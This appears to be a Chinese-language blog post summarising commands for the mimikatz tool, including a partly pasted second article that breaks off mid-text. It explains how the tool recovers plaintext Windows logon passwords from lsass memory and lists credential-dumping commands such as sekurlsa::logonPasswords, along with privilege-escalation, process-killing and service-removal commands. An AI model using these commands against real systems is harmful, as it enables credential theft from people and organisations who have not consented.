神器mimikatz使用命令方法總結
文章地址:http://www.isharepc.com/300.html
mimikatz是一款功能強大的輕量級調試神器,通過它你可以提升進程權限注入進程讀取進程內存,當然他最大的亮點也是讓阿剛最感興趣的就是他可以直接從 lsass中獲取當前處於Active系統的登錄密碼, lsass是微軟Windows系統的安全機制它主要用於本地安全和登陸策略,通常我們在登陸系統時輸入密碼之后,密碼便會儲存在 lsass內存中,經過其 wdigest 和 tspkg 兩個模塊調用后,對其使用可逆的算法進行加密並存儲在內存之中, 而mimikatz正是通過對lsass的逆算獲取到明文密碼!也就是說只要你不重啟電腦,就可以通過他獲取到登陸密碼,只限當前登陸系統!
下面簡單的介紹一下神器的命令
- cls-----------------------------清屏
- exit----------------------------退出
- version------------查看mimikatz的版本
- system::user-----查看當前登錄的系統用戶
- system::computer-------查看計算機名稱
- process::list------------------列出進程
- process::suspend 進程名稱 -----暫停進程
- process::stop 進程名稱---------結束進程
- process::modules --列出系統的核心模塊及所在位置
- service::list---------------列出系統的服務
- service::remove-----------移除系統的服務
- service::start stop 服務名稱--啟動或停止服務
- privilege::list---------------列出權限列表
- privilege::enable--------激活一個或多個權限
- privilege::debug-----------------提升權限
- nogpo::cmd------------打開系統的cmd.exe
- nogpo::regedit -----------打開系統的注冊表
- nogpo::taskmgr-------------打開任務管理器
- ts::sessions-----------------顯示當前的會話
- ts::processes------顯示進程和對應的pid情況等
- sekurlsa::wdigest-----獲取本地用戶信息及密碼
- sekurlsa::tspkg------獲取tspkg用戶信息及密碼
- sekurlsa::logonPasswords--獲登陸用戶信息及密碼
在網上找了一篇,但是和我的工具不是一樣
文章地址:http://www.2cto.com/article/201407/318229.html
ps:copy~
mimikatz是法國的一位神牛寫的神器,該神器有很強大的功能,據說已經被集成在metasplo
1.常規的操作使用命令
mimikatz # cls -->清屏,類似dos命令cls.
mimikatz # exit -->退出mimikatz.
mimikatz #version -->查看當前的mimikatz的版本.
隨便輸入"xxx::",會提示"modules:'xxx' intr0uvable",大概意思就是你輸入的命令不存在,然后會列出所有可用的命令
查看列表中命令的具體參數同樣可以輸入"命令::"來查看,比如:"inject::",如圖:
可以看到命令inject的具體參數有pid,process,service等……
2.系統方面的操作使用命令:system
mimikatz #system::user -->查看當前登錄的系統用戶
mimikazt #system::computer -->返回當前的計算機名稱
3.在服務器終端的操作命令: ts
mimikatz #ts::sessions -->顯示當前的會話
mimikatz #ts::processes windows-d.vm.nirvana.local -->顯示服務器的進程和對應的pid情況等。
4.系統服務相關的操作使用命令:service
5.系統進程相關操作的使用命令:process
6.系統線程相關操作使用命令:thread
7.系統句柄相關操作使用命令:handle
8.加密相關操作使用命令:crypto
9.注入操作使用命令:inject
具體的各種神器功能使用有待神人挖掘,表示不會外文壓力很大……
分享從lsass抓去系統的明文密碼案例